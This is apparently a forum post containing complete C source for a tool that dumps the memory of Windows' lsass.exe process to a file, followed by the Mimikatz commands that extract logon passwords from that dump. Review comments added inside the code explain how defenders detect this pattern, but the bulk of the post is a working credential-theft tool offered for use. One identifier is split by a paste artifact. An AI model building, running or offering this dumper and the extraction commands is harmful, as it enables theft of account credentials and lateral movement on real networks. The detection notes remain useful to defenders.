Code: <pre class="alt2" dir="ltr" style=" margin: 0px; padding: 6px; border: 1px solid rgb(0, 0, 0); width: 640px; height: 498px; text-align: left; overflow: auto; background: rgb(37, 37, 37) none repeat scroll 0% 0%; border-radius: 5px; font-size: 11px; text-shadow: none;">//lsass mem dump
//
//coded by sasami_327
////////////////////////////////////////////////////////
// What this listing does (as visible below): locate lsass.exe by name via a
// Toolhelp snapshot, enable SeDebugPrivilege on the current token, open the
// process with PROCESS_QUERY_INFORMATION|PROCESS_VM_READ and write a
// MiniDumpWithFullMemory minidump to "lsass.dmp" with dbghelp's MiniDumpWriteDump.
//
// NOTE(review, defender context): this exact sequence -- a non-system process
// acquiring SeDebugPrivilege and then a VM_READ handle to lsass.exe, followed by
// MiniDumpWriteDump -- is the textbook credential-access pattern. It is what
// process-access telemetry (e.g. Sysmon Event ID 10 on lsass.exe) and EDR
// LSASS-protection rules are built to surface, and it is what LSA Protection
// (RunAsPPL) / Credential Guard are designed to block. The code contains no
// attempt to evade either; it fails closed (no output) when OpenProcess or the
// privilege adjustment is denied.
//
// NOTE(review): the source appears to have been pasted through a forum that
// collapsed line breaks; the line structure below is restored, tokens are not.
#include <Windows.h>
#include <DbgHelp.h>
#include <stdio.h>
#include <TlHelp32.h>
#pragma comment(lib, "dbghelp")
// CWA(dll, api) simply expands to "::api": the dll argument is discarded, so
// there is no dynamic resolution here -- every API is presumably an ordinary
// static import (verify in the import table of a built binary). In several
// call sites below the macro wraps the whole call rather than just the name,
// which expands the same way.
#define CWA(dll, api) ::api

// Enable SeDebugPrivilege on the current process token.
// Returns TRUE only if OpenProcessToken, LookupPrivilegeValueA and
// AdjustTokenPrivileges all report success; each failure path prints the
// GetLastError() value and returns FALSE. The token handle is closed on both
// inner paths. Note that AdjustTokenPrivileges returning non-zero does not by
// itself prove the privilege was granted (it can succeed with
// ERROR_NOT_ALL_ASSIGNED) -- this code does not check for that case.
BOOL EnableSeDebugPrivilege(VOID)
{
    HANDLE token = NULL;
    LUID luid, *pluid;
    TOKEN_PRIVILEGES tokenPriv, *ptokenPriv;
    BOOL ret = FALSE;
    if ( CWA(kernel32, OpenProcessToken)(CWA(kernel32, GetCurrentProcess()), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &token) )
    {
        printf("Successfully OpenProcessToken\n");
        pluid = &luid;
        if ( CWA(kernel32, LookupPrivilegeValueA(NULL, "SeDebugPrivilege", pluid)) )
        {
            printf("Successfully LookupPrivilegeValueA\n");
            // Single-entry privilege array: enable SeDebugPrivilege.
            ptokenPriv = &tokenPriv;
            ptokenPriv->PrivilegeCount = 1;
            ptokenPriv->Privileges[0].Luid = luid;
            ptokenPriv->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
            if ( AdjustTokenPrivileges(token, FALSE, ptokenPriv, 0, 0, NULL) )
            {
                printf("Successfully AdjustTokenPrivileges\n");
                ret = TRUE;
            }
            else
            {
                printf("Failed to AdjustTokenPrivileges with error=%d\n", GetLastError());
            }
        }
        else
        {
            printf("Failed to LookupPrivilegeValueA with error=%d\n", GetLastError());
        }
        CWA(kernel32, CloseHandle)(token);
    }
    else
    {
        printf("Failed to OpenProcessToken with error=%d\n", GetLastError());
    }
    return(ret);
}

// Write a full-memory minidump of process `pid` to the relative path
// "lsass.dmp" (CREATE_ALWAYS, so an existing file is overwritten).
// Prints "OK" only when MiniDumpWriteDump succeeds; every other failure
// (OpenProcess, CreateFileA, MiniDumpWriteDump) is silent. Both handles are
// closed on the paths where they were opened. The OpenProcess access mask is
// the minimum MiniDumpWriteDump needs, which is also why a handle request with
// PROCESS_VM_READ against lsass.exe is the canonical detection point.
// NOTE(review): the split "PROCESS_VM_ READ" below is kept as the page shows it
// and looks like a rendering/line-wrap artifact of the forum paste.
VOID dump(DWORD pid)
{
    HANDLE process = NULL;
    HANDLE file = NULL;
    if ( ( process = CWA(kernel32, OpenProcess)(PROCESS_QUERY_INFORMATION|PROCESS_VM_ READ, FALSE, pid) ) )
    {
        if ( INVALID_HANDLE_VALUE != ( file = CWA(kernel32, CreateFileA)("lsass.dmp", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL) ) )
        {
            // MiniDumpWithFullMemory: all readable pages of the target, not just
            // thread/stack/module info -- the dump is therefore sized like the
            // target's working set.
            if ( CWA(dbghelp, MiniDumpWriteDump)( process, pid, file, MiniDumpWithFullMemory, NULL, NULL, NULL ) )
            {
                printf("OK\n");
            }
            CWA(kernel32, CloseHandle)(file);
        }
        CWA(kernel32, CloseHandle)(process);
    }
}

// Return the PID of the first process whose szExeFile matches `procName`
// exactly (strcmp: case-sensitive, no path), or (DWORD)-1 if no match.
// Walks a TH32CS_SNAPPROCESS snapshot with Process32First/Process32Next; the
// loop breaks on a match or when Process32Next fails with ERROR_NO_MORE_FILES.
// The snapshot handle is closed before returning.
DWORD GetPIDByProcessName(char* procName)
{
    DWORD retPID = -1;
    PROCESSENTRY32 pEntry32, *ppEntry32;
    HANDLE snapshot = NULL;
    if ( INVALID_HANDLE_VALUE != (snapshot = CWA(kernel32, CreateToolhelp32Snapshot)(TH32CS_SNAPPROCESS, 0)) )
    {
        ppEntry32 = &pEntry32;
        // dwSize must be set before Process32First or the call fails.
        ppEntry32->dwSize = sizeof(pEntry32);
        if ( CWA(kernel32, Process32First(snapshot, ppEntry32)) )
        {
            for ( ; ; )
            {
                if ( !strcmp(procName, ppEntry32->szExeFile) )
                {
                    retPID = ppEntry32->th32ProcessID;
                    break;
                }
                if ( !CWA(kernel32, Process32Next(snapshot, ppEntry32)) )
                {
                    if ( ERROR_NO_MORE_FILES == GetLastError() )
                    {
                        break;
                    }
                }
            }
        }
        CWA(kernel32, CloseHandle)(snapshot);
    }
    return(retPID);
}

// Entry point: hard-coded target "lsass.exe"; argc/argv are unused.
// Only proceeds to dump() if the PID was found and SeDebugPrivilege was
// enabled; always returns 0 regardless of outcome.
int main(int argc, char* argv[])
{
    DWORD lsass = GetPIDByProcessName("lsass.exe");
    if ( -1 != lsass )
    {
        printf("lsass=%d\n", lsass);
        if ( EnableSeDebugPrivilege() )
        {
            dump(lsass);
        }
    }
    return(0);
}</pre> sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords https://txgate.io/images/smilies/smoke.gif |